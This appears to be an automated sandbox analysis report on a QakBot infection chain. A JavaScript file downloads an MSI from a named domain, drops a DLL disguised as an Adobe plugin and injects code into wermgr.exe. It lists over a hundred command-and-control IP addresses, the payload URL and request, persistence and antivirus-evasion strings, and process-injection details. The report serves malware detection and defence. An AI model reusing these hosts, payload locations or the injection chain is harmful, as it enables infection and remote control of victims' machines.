Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: wininet.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: LastBootUpTime
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: S:(ML;;NW;;;LW)
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: urlmon.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Create
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_PnPEntity
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Initializing database...
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: winsta0\default
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .dat
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: WBJ_IGNORE
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: next
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: wpcap.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: image/pjpeg
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: fmon.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\SndVol.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: vbs
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aswhooka.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SysWOW64
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\mspaint.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: mpr.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: image/gif
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: crypt32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ntdll.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: open
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\explorer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: CSFalconService.exe;CSFalconContainer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\wextract.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\mobsync.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: unknown HTTPS traffic detected: 217.195.153.225:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 96.114.21.40:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: Binary string: ExtendScript.pdb source: rundll32.exe, 00000004.00000002.400246774.000000001006A000.00000002.00000001.01000000.00000006.sdmp, main.dll.1.dr
Source: C:\Windows\System32\msiexec.exe File opened: z:
Source: C:\Windows\System32\msiexec.exe File opened: x:
Source: C:\Windows\System32\msiexec.exe File opened: v:
Source: C:\Windows\System32\msiexec.exe File opened: t:
Source: C:\Windows\System32\msiexec.exe File opened: r:
Source: C:\Windows\System32\msiexec.exe File opened: p:
Source: C:\Windows\System32\msiexec.exe File opened: n:
Source: C:\Windows\System32\msiexec.exe File opened: l:
Source: C:\Windows\System32\msiexec.exe File opened: j:
Source: C:\Windows\System32\msiexec.exe File opened: h:
Source: C:\Windows\System32\msiexec.exe File opened: f:
Source: C:\Windows\System32\msiexec.exe File opened: b:
Source: C:\Windows\System32\msiexec.exe File opened: y:
Source: C:\Windows\System32\msiexec.exe File opened: w:
Source: C:\Windows\System32\msiexec.exe File opened: u:
Source: C:\Windows\System32\msiexec.exe File opened: s:
Source: C:\Windows\System32\msiexec.exe File opened: q:
Source: C:\Windows\System32\msiexec.exe File opened: o:
Source: C:\Windows\System32\msiexec.exe File opened: m:
Source: C:\Windows\System32\msiexec.exe File opened: k:
Source: C:\Windows\System32\msiexec.exe File opened: i:
Source: C:\Windows\System32\msiexec.exe File opened: g:
Source: C:\Windows\System32\msiexec.exe File opened: e:
Source: C:\Windows\System32\wscript.exe File opened: c:
Source: C:\Windows\System32\msiexec.exe File opened: a:

Networking

Source: Malware configuration extractor IPs: 24.234.220.88:990
Source: Malware configuration extractor IPs: 70.28.50.223:2078
Source: Malware configuration extractor IPs: 96.56.197.26:2083
Source: Malware configuration extractor IPs: 103.123.223.133:443
Source: Malware configuration extractor IPs: 83.249.198.100:2222
Source: Malware configuration extractor IPs: 199.27.66.213:443
Source: Malware configuration extractor IPs: 90.104.151.37:2222
Source: Malware configuration extractor IPs: 94.204.202.106:443
Source: Malware configuration extractor IPs: 72.205.104.134:443
Source: Malware configuration extractor IPs: 65.95.141.84:2222
Source: Malware configuration extractor IPs: 70.28.50.223:2078
Source: Malware configuration extractor IPs: 82.131.141.209:443
Source: Malware configuration extractor IPs: 77.126.99.230:443
Source: Malware configuration extractor IPs: 71.38.155.217:443
Source: Malware configuration extractor IPs: 205.237.67.69:995
Source: Malware configuration extractor IPs: 84.215.202.8:443
Source: Malware configuration extractor IPs: 24.234.220.88:465
Source: Malware configuration extractor IPs: 76.178.148.107:2222
Source: Malware configuration extractor IPs: 116.74.163.130:443
Source: Malware configuration extractor IPs: 70.28.50.223:2087
Source: Malware configuration extractor IPs: 147.147.30.126:2222
Source: Malware configuration extractor IPs: 173.88.135.179:443
Source: Malware configuration extractor IPs: 103.140.174.20:2222
Source: Malware configuration extractor IPs: 77.86.98.236:443
Source: Malware configuration extractor IPs: 92.149.250.113:2222
Source: Malware configuration extractor IPs: 96.87.28.170:2222
Source: Malware configuration extractor IPs: 86.168.210.41:443
Source: Malware configuration extractor IPs: 176.142.207.63:443
Source: Malware configuration extractor IPs: 12.172.173.82:32101
Source: Malware configuration extractor IPs: 86.132.236.117:443
Source: Malware configuration extractor IPs: 70.50.83.216:2222
Source: Malware configuration extractor IPs: 161.142.103.187:995
Source: Malware configuration extractor IPs: 45.62.70.33:443
Source: Malware configuration extractor IPs: 12.172.173.82:465
Source: Malware configuration extractor IPs: 178.175.187.254:443
Source: Malware configuration extractor IPs: 83.110.223.61:443
Source: Malware configuration extractor IPs: 105.184.209.194:995
Source: Malware configuration extractor IPs: 41.186.88.38:443
Source: Malware configuration extractor IPs: 102.156.10.183:443
Source: Malware configuration extractor IPs: 27.109.19.90:2078
Source: Malware configuration extractor IPs: 47.205.25.170:443
Source: Malware configuration extractor IPs: 12.172.173.82:993
Source: Malware configuration extractor IPs: 76.170.252.153:995
Source: Malware configuration extractor IPs: 69.242.31.249:443
Source: Malware configuration extractor IPs: 24.234.220.88:995
Source: Malware configuration extractor IPs: 125.99.69.178:443
Source: Malware configuration extractor IPs: 79.168.224.165:2222
Source: Malware configuration extractor IPs: 75.143.236.149:443
Source: Malware configuration extractor IPs: 14.192.241.76:995
Source: Malware configuration extractor IPs: 124.122.47.148:443
Source: Malware configuration extractor IPs: 81.229.117.95:2222
Source: Malware configuration extractor IPs: 98.145.23.67:443
Source: Malware configuration extractor IPs: 114.143.176.236:443
Source: Malware configuration extractor IPs: 103.144.201.48:2078
Source: Malware configuration extractor IPs: 122.186.210.254:443
Source: Malware configuration extractor IPs: 69.160.121.6:61201
Source: Malware configuration extractor IPs: 12.172.173.82:21
Source: Malware configuration extractor IPs: 72.253.126.216:443
Source: Malware configuration extractor IPs: 75.109.111.89:443
Source: Malware configuration extractor IPs: 76.86.31.59:443
Source: Malware configuration extractor IPs: 116.120.145.170:995
Source: Malware configuration extractor IPs: 12.172.173.82:50001
Source: Malware configuration extractor IPs: 81.101.185.146:443
Source: Malware configuration extractor IPs: 201.244.108.183:995
Source: Malware configuration extractor IPs: 68.203.69.96:443
Source: Malware configuration extractor IPs: 103.139.242.6:443
Source: Malware configuration extractor IPs: 103.42.86.42:995
Source: Malware configuration extractor IPs: 85.61.165.153:2222
Source: Malware configuration extractor IPs: 76.16.49.134:443
Source: Malware configuration extractor IPs: 125.99.76.102:443
Source: Malware configuration extractor IPs: 184.182.66.109:443
Source: Malware configuration extractor IPs: 70.28.50.223:32100
Source: Malware configuration extractor IPs: 50.68.204.71:993
Source: Malware configuration extractor IPs: 85.57.212.13:3389
Source: Malware configuration extractor IPs: 41.227.190.59:443
Source: Malware configuration extractor IPs: 70.28.50.223:3389
Source: Malware configuration extractor IPs: 31.53.29.235:2222
Source: Malware configuration extractor IPs: 89.79.229.50:443
Source: Malware configuration extractor IPs: 50.68.186.195:443
Source: Malware configuration extractor IPs: 47.199.241.39:443
Source: Malware configuration extractor IPs: 93.147.235.8:443
Source: Malware configuration extractor IPs: 75.141.227.169:443
Source: Malware configuration extractor IPs: 45.243.142.31:995
Source: Malware configuration extractor IPs: 79.92.15.6:443
Source: Malware configuration extractor IPs: 85.104.105.67:443
Source: Malware configuration extractor IPs: 89.129.109.27:2222
Source: Malware configuration extractor IPs: 86.176.83.44:2222
Source: Malware configuration extractor IPs: 24.234.220.88:993
Source: Malware configuration extractor IPs: 89.32.156.5:995
Source: Malware configuration extractor IPs: 12.172.173.82:22
Source: Malware configuration extractor IPs: 103.101.203.177:443
Source: Malware configuration extractor IPs: 70.28.50.223:2083
Source: Malware configuration extractor IPs: 98.187.21.2:443
Source: Malware configuration extractor IPs: 70.49.205.198:2222
Source: Malware configuration extractor IPs: 96.56.197.26:2222
Source: Malware configuration extractor IPs: 92.9.45.20:2222
Source: Malware configuration extractor IPs: 86.195.14.72:2222
Source: Malware configuration extractor IPs: 172.115.17.50:443
Source: Malware configuration extractor IPs: 100.4.163.158:2222
Source: Malware configuration extractor IPs: 80.12.88.148:2222
Source: Malware configuration extractor IPs: 213.64.33.92:2222
Source: Malware configuration extractor IPs: 113.11.92.30:443
Source: Malware configuration extractor IPs: 78.192.109.105:2222
Source: Malware configuration extractor IPs: 47.34.30.133:443
Source: Malware configuration extractor IPs: 122.184.143.86:443
Source: Malware configuration extractor IPs: 198.2.51.242:993
Source: Malware configuration extractor IPs: 165.120.169.171:2222
Source: Malware configuration extractor IPs: 88.126.94.4:50000
Source: Malware configuration extractor IPs: 82.125.44.236:2222
Source: Malware configuration extractor IPs: 117.195.17.148:993
Source: Malware configuration extractor IPs: 147.219.4.194:443
Source: Malware configuration extractor IPs: 80.167.196.79:443
Source: Malware configuration extractor IPs: 92.154.17.149:2222
Source: Malware configuration extractor IPs: 184.181.75.148:443
Source: Malware configuration extractor IPs: 95.45.50.93:2222
Source: Malware configuration extractor IPs: 84.35.26.14:995
Source: Malware configuration extractor IPs: 201.143.215.69:443
Source: Malware configuration extractor IPs: 12.172.173.82:2087
Source: Malware configuration extractor IPs: 50.68.204.71:443
Source: Malware configuration extractor IPs: 64.121.161.102:443
Source: Joe Sandbox View ASN Name: CHARTER-20115US CHARTER-20115US
Source: Joe Sandbox View JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox View IP Address: 75.143.236.149 75.143.236.149
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cacheCookie: xpgn=1
Source: global traffic TCP traffic: 192.168.2.5:49726 -> 105.184.209.194:995
Source: unknown Network traffic detected: IP country count 32
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: unknown TCP traffic detected without corresponding DNS query: 105.184.209.194
Source: national[1].htm.5.dr String found in binary or memory: Find tutorials and demos\u003C\u002Fa\u003E\u003C\u002Fli\u003E\u003Cli\u003E\u003Ca rel=\"nofollow\" href=\"https:\u002F\u002Fwww.facebook.com\u002Fxfinity\"\u003EFacebook equals www.facebook.com (Facebook)
Source: wscript.exe, 00000000.00000002.392570780.000001C96BC1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392118030.000001C96BC1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.391972717.000001C96BBE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392048669.000001C96BBF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://%/%.msi%InstallProduct
Source: 4fa97f.rbs.1.dr String found in binary or memory: https://garokelka.com/
Source: 4fa97f.rbs.1.dr String found in binary or memory: https://garokelka.com/$
Source: wscript.exe, 00000000.00000003.392048669.000001C96BC35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392263721.000001C96BC35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.392570780.000001C96BC35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://garokelka.com/yjxcii.msi
Source: ~DF22471B5A50AA2E97.TMP.1.dr String found in binary or memory: https://garokelka.com/yjxcii.msi-825014416310365950
Source: ~DFB376DA478E956195.TMP.1.dr, inprogressinstallinfo.ipi.1.dr, ~DFBDB1CFA03CBC6FC5.TMP.1.dr, ~DF2A70DF5CEC56BF5D.TMP.1.dr, ~DF79B335FA0EB48BA5.TMP.1.dr, ~DF95BD744A4429F4FF.TMP.1.dr String found in binary or memory: https://garokelka.com/yjxcii.msi0C:
Source: wscript.exe, 00000000.00000002.392535316.000001C96BBF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.391972717.000001C96BBE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392048669.000001C96BBF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://garokelka.com/yjxcii.msill.mui
Source: national[1].htm.5.dr String found in binary or memory: https://www.xfinity.com/learn/internet-service/acp
Source: national[1].htm.5.dr String found in binary or memory: https://www.xfinity.com/mobile/policies/broadband-disclosures
Source: national[1].htm.5.dr String found in binary or memory: https://www.xfinity.com/networkmanagement
Source: unknown DNS traffic detected: queries for: garokelka.com
Source: global traffic HTTP traffic detected: GET /yjxcii.msi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: garokelka.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cacheCookie: xpgn=1
Source: unknown HTTPS traffic detected: 217.195.153.225:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 96.114.21.40:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: 4.2.rundll32.exe.ee0950.0.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 4.2.rundll32.exe.fd0000.1.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 4.2.rundll32.exe.ee0950.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\4fa980.msi
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI319E.tmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1002B980 4_2_1002B980
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10059B40 4_2_10059B40
Source: ProjectFunding_450726_Jun01.js Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ProjectFunding_450726_Jun01.js"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF22471B5A50AA2E97.TMP
Source: classification engine Classification label: mal92.troj.evad.winJS@10/19@3/100
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\{73B1D26A-63AE-4441-A78B-E87C4AC58080}
Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\{9F22E6A9-49AA-41B0-8132-BBF5C96D0FE5}
Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{9F22E6A9-49AA-41B0-8132-BBF5C96D0FE5}
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs
Source: wscript.exe, 00000000.00000002.392487359.000001C96BBD0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;.VBP
Source: C:\Windows\System32\msiexec.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\msiexec.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: ExtendScript.pdb source: rundll32.exe, 00000004.00000002.400246774.000000001006A000.00000002.00000001.01000000.00000006.sdmp, main.dll.1.dr
Source: main.dll.1.dr Static PE information: real checksum: 0xc399f should be: 0xcbceb
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 4744 base: DB3C50 value: E9 63 D7 DC FF
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: wermgr.exe, 00000005.00000003.424428035.0000000004C95000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: BEHAVIORDUMPER.EXE
Source: wermgr.exe, 00000005.00000003.424428035.0000000004C95000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: BEHAVIORDUMPER.EXEU
Source: wermgr.exe, 00000005.00000003.424428035.0000000004C95000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROC_ANALYZER.EXE
Source: wermgr.exe, 00000005.00000003.424428035.0000000004C95000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROC_ANALYZER.EXEU
Source: C:\Windows\System32\msiexec.exe TID: 5420 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5640 Thread sleep count: 188 > 30
Source: C:\Windows\SysWOW64\wermgr.exe TID: 4716 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 0.7 %
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_100559A0 GetVersionExA,GetVersionExA,GetVersionExA,GetSystemInfo, 4_2_100559A0
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1005C09A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_1005C09A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_00FC2297 mov eax, dword ptr fs:[00000030h] 4_3_00FC2297
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_100379BC mov eax, dword ptr fs:[00000030h] 4_2_100379BC
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1005C09A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_1005C09A

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: BB0000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: B80000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: DB3C50
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: B80000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: BB0000 protect: page read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
